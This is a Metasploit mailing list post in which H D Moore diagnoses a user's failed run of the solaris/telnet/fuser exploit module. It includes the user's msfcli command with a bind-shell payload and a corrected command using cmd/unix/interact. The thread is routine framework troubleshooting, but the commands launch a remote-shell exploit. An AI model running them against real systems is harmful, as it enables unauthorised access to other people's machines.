Metasploit mailing list archives
solaris/telnet/fuser
From: hdm at metasploit.com (H D Moore)
Date: Tue, 14 Oct 2008 16:48:32 -0500
On Tuesday 14 October 2008, Joshua Smith wrote:
Question: root at laptop:~/framework-trunk# ./msfcli solaris/telnet/fuser RHOST=192.168.1.1 PAYLOAD=solaris/x86/shell_bind_tcp E [*] Started bind handler [*] Setting USER environment variable... [-] Exploit failed: undefined method `put' for nil:NilClass
Two issues here: 1. The sock object for the connection is being set to nil by something and throwing the error you see, but the module code looks fine, so this migt be related to (2). 2. That module doesn't really use payloads, it should only match payloads which have the flag 'cmd_interact', which resolves to exactly one payload that interacts with the current socket as a shell. There is a bug that results in this exploit accepting incompatible payloads and showing no compatible payloads when asked. Good bug reports, the short-term fix for what you are doing should be: $ msfcli exploit/solaris/telnet/fuser PAYLOAD=cmd/unix/interact \ RHOST=A.B.C.D E -HD
Current thread:
- solaris/telnet/fuser Joshua Smith (Oct 14)
- solaris/telnet/fuser H D Moore (Oct 14)
- solaris/telnet/fuser MC (Oct 14)
- <Possible follow-ups>
- solaris/telnet/fuser Joshua Smith (Oct 14)